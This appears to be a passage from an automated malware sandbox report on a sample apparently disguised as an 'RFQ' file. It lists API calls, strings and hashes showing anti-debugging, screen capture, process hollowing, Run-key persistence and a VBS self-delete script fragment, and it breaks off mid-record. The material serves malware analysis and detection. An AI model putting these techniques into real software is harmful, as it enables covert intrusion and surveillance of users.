                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                            • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                            • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                            • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                            • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                            APIs
                            • GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
                            • TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
                            • ExitProcess.KERNEL32 ref: 0044259E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                            • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                            • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                            • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                            • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                            • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                            • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                            • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$InfoLocale_abort
                            • String ID:
                            • API String ID: 1663032902-0
                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                            • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                            • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                            • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                            • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                            • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale_abort_free
                            • String ID:
                            • API String ID: 2692324296-0
                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                            • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                            • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                            • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                            • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                            • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                            APIs
                              • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                            • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                            • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                            • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                            • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID:
                            • API String ID: 1084509184-0
                            • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                            • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                            • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                            • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                            APIs
                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                            • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                            • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                            • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                            • Instruction Fuzzy Hash:
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                            APIs
                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                              • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                            • DeleteDC.GDI32(?), ref: 0041806D
                            • DeleteDC.GDI32(00000000), ref: 00418070
                            • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                            • GetIconInfo.USER32(?,?), ref: 004180DB
                            • DeleteObject.GDI32(?), ref: 0041810A
                            • DeleteObject.GDI32(?), ref: 00418117
                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                            • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                            • DeleteDC.GDI32(?), ref: 0041828F
                            • DeleteDC.GDI32(00000000), ref: 00418292
                            • DeleteObject.GDI32(00000000), ref: 00418295
                            • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                            • DeleteObject.GDI32(00000000), ref: 00418354
                            • GlobalFree.KERNEL32(?), ref: 0041835B
                            • DeleteDC.GDI32(?), ref: 0041836B
                            • DeleteDC.GDI32(00000000), ref: 00418376
                            • DeleteDC.GDI32(?), ref: 004183A8
                            • DeleteDC.GDI32(00000000), ref: 004183AB
                            • DeleteObject.GDI32(?), ref: 004183B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                            • String ID: DISPLAY
                            • API String ID: 1765752176-865373369
                            • Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                            • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                            • Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
                            • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                            • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                            • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                            • ResumeThread.KERNEL32(?), ref: 00417582
                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                            • GetLastError.KERNEL32 ref: 004175C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                            • API String ID: 4188446516-3035715614
                            • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                            • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                            • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                            • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                            • ExitProcess.KERNEL32 ref: 0041151D
                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                              • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                              • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                              • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                            • API String ID: 4250697656-2665858469
                            • Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                            • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                            • Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
                            • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                            • ExitProcess.KERNEL32 ref: 0040C63E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                            • API String ID: 1861856835-3168347843
                            • Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                            • Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
                            • Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
                            • Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E
                            APIs
                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
